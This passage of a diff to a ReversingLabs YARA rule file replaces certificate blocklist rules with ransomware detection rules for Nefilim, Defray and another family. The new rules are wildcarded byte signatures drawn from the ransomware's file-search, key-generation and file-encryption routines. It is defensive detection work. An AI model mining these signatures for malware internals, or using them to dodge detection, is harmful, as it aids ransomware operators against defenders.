+            03 0B 45 33 C0 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0B 48 03 CF 48 C7 41 ?? ??
+            ?? ?? ?? 48 83 79 ?? ?? 72 ?? 48 8B 09 C6 01 ?? FF C6 48 83 C7 ?? 3B 73 ?? 75 ?? 48
+            8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ??
+            48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48
+            83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 33 F6 F6 44 0C
+            ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D
+            ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ??
+            48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 48 8D 4C 24 ?? E8
+            ?? ?? ?? ?? BB ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 44 24 ??
+            48 03 C8 41 8B D4 48 83 79 ?? ?? 0F 45 D3 0B 51 ?? 45 33 C0 E8 ?? ?? ?? ?? 48 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 85
+            ?? ?? ?? ?? 48 03 C8 48 83 79 ?? ?? 44 0F 45 E3 44 0B 61 ?? 45 33 C0 41 8B D4 E8 ??
+            ?? ?? ?? 90 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 89 BC 0D ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 63 48 ?? 8D 91 ?? ?? ?? ?? 89 94 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 84 0D ?? ?? ??
+            ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 8D 51 ?? 89 94 0D ?? ?? ?? ?? 48 8D 1D ?? ?? ??
+            ?? 48 89 9D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44 24 ?? 48 63
+        }
+		$encrypt_files_p4 = {
+            48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 91 ?? ?? ??
+            ?? 89 54 0C ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 05 ??
+            ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 51 ?? 89 54 0C ?? 48 89 5D ??
+            48 8D 4D ?? E8 ?? ?? ?? ?? 90 49 8B 57 ?? 48 83 FA ?? 72 ?? 49 8B 0F 48 FF C2 48 81
+            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89 77 ?? 49 C7 47 ?? ?? ?? ?? ?? 41 C6 07 ??
+            49 8B 56 ?? 48 83 FA ?? 72 ?? 48 FF C2 49 8B 0E 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
+            ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89
+            76 ?? 49 C7 46 ?? ?? ?? ?? ?? 41 C6 06 ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ??
+            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3
+            E8
+        }
+		$encrypt_files_p5 = {
+            48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 4C 89 40 ?? 55 41 54 41 55 41 56 41 57
+            48 8D 68 ?? 48 81 EC ?? ?? ?? ?? 45 8B E1 49 8B D8 44 8B 4D ?? 48 8B FA 44 8B 45 ??
+            48 8B F1 41 8B D4 48 8D 4D ?? E8 ?? ?? ?? ?? 0F 10 00 F2 0F 10 48 ?? 0F 11 45 ?? 66
+            0F 73 D8 ?? 66 49 0F 7E C7 F2 0F 11 4D ?? 49 C1 EF ?? F2 0F 11 4D ?? 4C 89 7D ?? 41
+            83 FF ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 07 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ??
+            ?? ?? C7 00 ?? ?? ?? ?? EB ?? 8B 4D ?? 4C 8D 4D ?? 4C 8B 75 ?? 41 8B C4 48 8B 55 ??
+            45 8B C7 C1 E8 ?? 49 C1 EE ?? F7 D0 44 0B 75 ?? 83 E0 ?? C7 06 ?? ?? ?? ?? 33 F6 48
+            89 74 24 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B CB 48 C1 EA ?? C7 45 ?? ?? ?? ?? ?? 48
+            89 75 ?? 89 45 ?? 4C 89 75 ?? FF 15 ?? ?? ?? ?? 8B 5D ?? B9 ?? ?? ?? ?? 4C 8B E8 48
+            83 F8 ?? 75 ?? 8B C3 23 C1 3B C1 75 ?? 41 F6 C4 ?? 74 ?? 8B 4D ?? 4C 8D 4D ?? 48 89
+            74 24 ?? 0F BA F3 ?? 89 5D ?? 45 8B C7 48 8B 55 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B
+        }
+		$encrypt_files_p6 = {
+            4D ?? 48 C1 EA ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 83 F8 ?? 75 ?? 48 63 0F 4C 8D 3D ??
+            ?? ?? ?? 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8 ?? ?? FF 15
+            ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? FF 15 ?? ?? ?? ?? 8B C8 8B D8 E8 ?? ?? ?? ?? 48 63 17 4C 8D 3D ?? ?? ?? ?? 48 8B
+            CA 83 E2 ?? 48 C1 F9 ?? 48 8D 14 D2 49 8B 0C CF 80 64 D1 ?? ?? 49 8B CD FF 15 ?? ??
+            ?? ?? 85 DB 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 44 8A
+            75 ?? 83 F8 ?? 75 ?? 41 80 CE ?? EB ?? 83 F8 ?? 75 ?? 41 80 CE ?? 8B 0F 49 8B D5 E8
+            ?? ?? ?? ?? 48 63 0F 4C 8D 3D ?? ?? ?? ?? 48 8B C1 41 80 CE ?? 48 C1 F8 ?? 83 E1 ??
+            44 88 75 ?? 49 8B 04 C7 48 8D 0C C9 44 88 74 C8 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1
+            F8 ?? 48 8D 0C C9 49 8B 04 C7 40 88 74 C8 ?? 41 F6 C4 ?? 74 ?? 8B 0F E8 ?? ?? ?? ??
+            89 45 ?? 85 C0 74 ?? 8B 0F E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 0F 10 45 ?? 4C 8D
+            4D ?? 8B 0F F2 0F 10 4D ?? 48 8D 55 ?? 45 8B C4 0F 29 45 ?? 40 88 75 ?? F2 0F 11 4D
+            ?? E8 ?? ?? ?? ?? 48 63 0F 89 45 ?? 85 C0 75 ?? 48 8B C1 48 C1 F9 ?? 83 E0 ?? 49 8B
+        }
+		$encrypt_files_p7 = {
+            0C CF 48 8D 14 C0 8A 45 ?? 88 44 D1 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D
+            14 C9 49 8B 0C C7 41 8B C4 C1 E8 ?? 24 ?? 80 64 D1 ?? ?? 08 44 D1 ?? 41 F6 C6 ?? 75
+            ?? 41 F6 C4 ?? 74 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7
+            80 4C C8 ?? ?? B9 ?? ?? ?? ?? 8B C3 23 C1 3B C1 0F 85 ?? ?? ?? ?? 41 F6 C4 ?? 0F 84
+            ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8B 4D ?? 4C 8D 4D ?? 44 8B 45 ?? 0F BA F3
+            ?? 48 89 74 24 ?? 89 4C 24 ?? 8B 4D ?? 89 4C 24 ?? 48 8B 4D ?? 89 5D ?? 48 8B 55 ??
+            48 C1 EA ?? FF 15 ?? ?? ?? ?? 48 8B D0 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B C8 E8
+            ?? ?? ?? ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8
+            ?? ?? 8B 0F E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 0F 48 8B C1 48 C1 F8 ?? 83 E1 ?? 49
+            8B 04 C7 48 8D 0C C9 48 89 54 C8 ?? 33 C0 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B
+            73 ?? 49 8B 7B ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TECHNO BEAVERS LIMITED" and pe.signatures [ i ] . serial == "3b:d6:a5:bb:a2:8e:7c:1c:a4:48:80:15:9d:ac:e2:37" and 1563408000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_C04F8F1E00C69E96A51Bf14Aab1C6Ae0 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Nefilim : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Nefilim ransomware."
 		author = "ReversingLabs"
-		id = "6513160e-ece5-500b-8b0b-4b8a6e04c0af"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "aec298c1-abf8-5446-9dbb-795f9fcf8e94"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3414-L3432"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c2b5ffa305b761b57dd91c0acea0d8f82bec6b7d3608be10a20ea63621f3f3e8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Nefilim.yara#L1-L150"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fae0350e51aee2777475d2222848b30fd39fa39ceea260132b0c7fbc536b3a86"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Nefilim"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$create_encryption_key = {
+            55 8B EC 51 A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 56 50 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
+            ?? 8B F0 A1 ?? ?? ?? ?? 59 89 75 ?? 73 ?? B8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 33 F6 59 59 39 35 ?? ?? ?? ?? 75 ?? 53 57 8B 3D ?? ?? ?? ?? 56 6A ?? 56 BE
+            ?? ?? ?? ?? 56 BB ?? ?? ?? ?? 53 FF D7 85 C0 75 ?? 6A ?? 6A ?? 50 56 53 FF D7 85 C0
+            75 ?? 50 FF 15 ?? ?? ?? ?? 5F 33 F6 5B A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 68 ?? ?? ??
+            ?? 56 56 50 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 EB ?? 5E C9
+            C3
+        }
+		$encrypt_encryption_key = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 83 78 ?? ?? 59 72 ?? 8B 00 53 56 57 33 DB 53 53 6A ?? 53 53 68 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 39 5D ?? 0F 84
+            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B
+            C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 50 57 E8 ?? ??
+            ?? ?? 59 59 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 89 45 ?? 8D 45 ?? 50 56 6A
+            ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? FF 15 ?? ?? ??
+            ?? 8D 45 ?? 50 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 50 56 FF 75 ?? FF 15 ??
+            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 83 7D ?? ?? 8B 45 ?? 53
+            56 57 73 ?? 8D 45 ?? 33 DB 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89
+            44 24 ?? 3B C3 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ??
+            6B C0 ?? 83 C0 ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? 89 44 24 ??
+            E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? BE
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 56 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ??
+            89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ??
+            ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 7E ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ??
+            33 FF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 53 53 FF 74 24 ?? FF 74 24 ??
+            FF 74 24 ?? FF D7 53 FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ??
+            FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
+            F8 ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 53 03 C6 53 13 CB 51 50 FF 74 24 ??
+            FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B
+        }
+		$encrypt_files_p2 = {
+            4C 24 ?? 53 05 ?? ?? ?? ?? 53 13 CB 51 50 FF 74 24 ?? FF D7 53 E8 ?? ?? ?? ?? 0B C2
+            59 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ??
+            ?? ?? 8B 3D ?? ?? ?? ?? 53 8D 44 24 ?? 50 FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 74
+            24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9
+            ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ??
+            3B CB 0F 86 ?? ?? ?? ?? BE ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 2B 4C 24 ?? 1B 44 24 ?? 89
+            44 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 53 FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 53 FF 74 24 ?? 89 44 24 ?? FF 74 24 ?? FF 74 24 ??
+            FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B
+            54 24 ?? 51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF
+            74 24 ?? FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? FF 74 24 ?? 53 50 FF 15 ?? ?? ?? ?? 81 44 24 ?? ?? ?? ?? ?? 8B 44 24 ??
+            11 5C 24 ?? 39 44 24 ?? 0F 8C ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B 4C 24 ?? 39 4C 24 ??
+            0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F
+        }
+		$encrypt_files_p3 = {
+            86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 59 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 FF 74 24 ?? FF D7 53
+            8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ??
+            51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 50 FF 74 24 ?? FF D7 53 8D
+            44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ??
+            59 E9 ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? FF 15 ??
+            ?? ?? ?? 53 53 33 C0 50 53 FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24
+            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24
+            ?? 8B 54 24 ?? 51 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 53
+            FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ?? ??
+            ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ??
+            E8 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ??
+            E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 45 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 83 7D ?? ?? 8B
+            4D ?? 73 ?? 8D 4D ?? 50 51 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ??
+            6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5
+            5D C3
+        }
+		$find_files_1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56
+            57 6A ?? 5E 33 C0 33 FF 6A ?? 66 89 44 24 ?? 57 8D 45 ?? 8D 4C 24 ?? 89 74 24 ?? 89
+            7C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 66
+            89 44 24 ?? 66 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 03 44 24 ?? 8D 4C 24 ?? 89 74 24 ??
+            89 7C 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 57 8D 44 24 ?? 50 83 C8 ?? 8D 74
+            24 ?? E8 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 83 C8 ?? E8 ?? ?? ?? ?? 8B DE 8D 44
+            24 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24
+            ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
+        }
+		$find_files_2 = {
+            D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? F6
+            84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 8D 44 24 ?? 74 ?? E8 ?? ??
+            ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 59 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33
+            FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 21 79
+            ?? 33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 50 8D 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A
+            ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D
+            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 5F 39 7C 24 ?? 73 ?? 8D 44 24 ?? 8B 35 ??
+            ?? ?? ?? 68
+        }
+		$find_files_3 = {
+            50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ??
+            ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68
+            ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24
+            ?? 68 ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68
+            ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ??
+            ?? ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 74 ??
+            8B 4C 24 ?? 39 7C 24 ?? 73 ?? 8D 4C 24 ?? 83 EC ?? 8B C4 51 E8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74
+            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 DB
+            43 53 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 53 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D
+            74 24 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33
+            CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHAIKA, TOV" and ( pe.signatures [ i ] . serial == "00:c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0" or pe.signatures [ i ] . serial == "c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0" ) and 1551398400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( $create_encryption_key ) and ( $encrypt_encryption_key ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_23F537Ce13C6Cccdfd3F8Ce81Fb981Cb : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Defray : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Defray ransomware."
 		author = "ReversingLabs"
-		id = "f48b7818-5b34-5609-822a-39a2e7fb44c5"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "bc9e2dfe-168b-5b99-8523-07bfdcba44f2"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3434-L3450"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d347bce3eddd0cac276a7504955f0342ae44fd93d238e514af5b1fdc208b68fc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Defray.yara#L1-L157"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "82d883c77f49e50edbc7af05a108d4d54a46dca7661e4d0cd8aeffa19cb8df98"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Defray"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ISECURE GROUP PTY LTD" and pe.signatures [ i ] . serial == "23:f5:37:ce:13:c6:cc:cd:fd:3f:8c:e8:1f:b9:81:cb" and 1566086400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_73Ecfdbb99Aec176Ddfcf7958D120E1A : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "84e20878-e4ea-53a5-9c1b-04f3c66276de"
